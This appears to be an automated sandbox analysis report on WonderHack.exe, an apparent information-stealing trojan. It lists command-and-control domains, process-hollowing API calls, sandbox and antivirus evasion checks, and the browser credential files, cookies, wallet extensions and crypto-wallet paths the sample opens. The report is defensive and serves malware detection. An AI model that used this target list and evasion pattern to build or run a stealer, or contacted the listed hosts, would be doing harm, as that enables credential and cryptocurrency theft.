Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: WonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: WonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CAC040
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00C91000
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA6194
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CB1250
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CBEB72
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CAAC41
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CBCD97
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: String function: 00CA66A0 appears 50 times
Source: WonderHack.exe, 00000000.00000000.1696868394.0000000000D21000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
Source: WonderHack.exe, 00000002.00000002.2585059014.0000000000D21000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
Source: WonderHack.exe, 00000002.00000003.1704267961.0000000000BEF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
Source: WonderHack.exe | Binary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
Source: WonderHack.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: WonderHack.exe | Static PE information: Section: .bss ZLIB complexity 1.000336057282794
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/1@11/3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: WonderHack.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\WonderHack.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WonderHack.exe, 00000002.00000003.2453297401.00000000032FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: WonderHack.exe | Virustotal: Detection: 38%
Source: WonderHack.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\WonderHack.exe | File read: C:\Users\user\Desktop\WonderHack.exe
Source: unknown | Process created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"
Source: C:\Users\user\Desktop\WonderHack.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WonderHack.exe | Process created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WonderHack.exe | Section loaded: version.dll
Source: WonderHack.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: WonderHack.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WonderHack.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WonderHack.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WonderHack.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WonderHack.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA67C3 push ecx; ret 0_2_00CA67D6
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 2_3_00F5ED3C push eax; retf 2_3_00F5ED3D
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 2_3_00F5FA24 pushad ; retf 2_3_00F5FA25
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 2_3_00F147F8 pushfd ; iretd 2_3_00F147FD
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 2_3_00F1403C push esp; retf 2_3_00F14041
Source: C:\Users\user\Desktop\WonderHack.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\WonderHack.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\WonderHack.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-22240
Source: C:\Users\user\Desktop\WonderHack.exe TID: 1076 | Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\Desktop\WonderHack.exe TID: 3704 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\WonderHack.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CB9126 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430352231.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527263074.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\WonderHack.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CAF2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CCF19E mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00C916C0 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CB4ABC GetProcessHeap
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA651C SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA6528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CCF19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
Source: C:\Users\user\Desktop\WonderHack.exe | Memory written: C:\Users\user\Desktop\WonderHack.exe base: 400000 value starts with: 4D5A
Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: steppriflej.xyz
Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: sendypaster.xyz
Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bellflamre.click
Source: C:\Users\user\Desktop\WonderHack.exe | Process created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW 0_2_00CB83DF
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: EnumSystemLocalesW 0_2_00CB43A7
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW 0_2_00CB86CB
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: EnumSystemLocalesW 0_2_00CB8630
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW 0_2_00CB897D
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: EnumSystemLocalesW 0_2_00CB891E
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW 0_2_00CB8A9D
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: EnumSystemLocalesW 0_2_00CB8A52
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP 0_2_00CB8B44
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW 0_2_00CB8C4A
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: GetLocaleInfoW 0_2_00CB3EAC
Source: C:\Users\user\Desktop\WonderHack.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CA7110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\WonderHack.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: WonderHack.exe, 00000002.00000003.2532156311.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585755451.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545384166.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532963840.00000000032EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\WonderHack.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                    Source: WonderHack.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                    Source: WonderHack.exeString found in binary or memory: Wallets/JAXX New Version
                    Source: WonderHack.exeString found in binary or memory: window-state.json
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Ethereum
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
